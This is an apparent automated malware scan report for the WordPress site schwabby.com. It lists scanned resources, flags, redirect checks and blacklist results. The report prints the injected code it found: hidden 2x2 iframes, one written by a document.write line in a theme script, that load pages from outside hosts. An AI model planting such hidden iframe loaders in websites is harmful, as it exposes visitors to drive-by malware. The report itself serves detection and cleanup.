Scanned pages/files
Request | Server response | Status |
http://www.schwabby.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 09 Sep 2014 06:39:22 GMT Pragma: no-cache Location: http://schwabby.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ca27ed50723a59dc1ccdaf1b10d56925; path=/ X-Pingback: http://schwabby.com/xmlrpc.php | clean |
http://schwabby.com/ | 200 OK Content-Length: 71999 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://gimnasiopontevedra.net/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gimnasiopontevedra.net/hmod.html> | ||
http://schwabby.com/wp-content/themes/smiley_theme_2/script.js | 200 OK Content-Length: 10799 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) cssFix = function(){ var u = navigator.userAgent.toLowerCase(), addClass = function(el, val){ if(! el.className) { el.className = val; } else { var newCl = el.className; newCl+=(' '+val); el.className = newCl; } }, is = function(t){return (u.indexOf(t)!=-1)}; addClass(document.getElementsByTagName('html')[0],[ (!(/opera|webtv/i.test(u))&&/msie (\d)/.test(u))?('ie ie'+RegExp.$1) : is('firefox/2')?'gecko firefox2' : is( wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salsagetaways.com/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salsagetaways.com/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salsagetaways.com/hmod.html> | ||
http://schwabby.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://schwabby.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: text/javascript | clean |
http://schwabby.com/wp-content/plugins/wp-cart-for-digital-products/lib/eStore_read_form.min.1.js | 200 OK Content-Length: 938 Content-Type: application/javascript | clean |
http://ws.amazon.com/widgets/q?ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/schwabby-20/8001/914a2c34-fdc8-4fdc-a3de-03ad26a0114c | 200 OK Content-Length: 3573 Content-Type: application/javascript | clean |
http://schwabby.com/wp-content/plugins/wp-cart-for-digital-products/lib/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 10036 Content-Type: application/javascript | clean |
http://www.schwabby.com/flash/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.schwabby.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.schwabby.com/flash | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: schwabby.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 09 Sep 2014 06:39:24 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=35449e95e8cadabf9a4ff4e96f049462; path=/
X-Pingback: http://schwabby.com/xmlrpc.php
GET / HTTP/1.1
Host: schwabby.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 09 Sep 2014 06:39:24 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=35449e95e8cadabf9a4ff4e96f049462; path=/
X-Pingback: http://schwabby.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: schwabby.com
Referer: http://www.google.com/search?q=schwabby.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: schwabby.com
Referer: http://www.google.com/search?q=schwabby.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=schwabby.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://schwabby.com/
Result: schwabby.com is not infected or malware details are not published yet.
Result: schwabby.com is not infected or malware details are not published yet.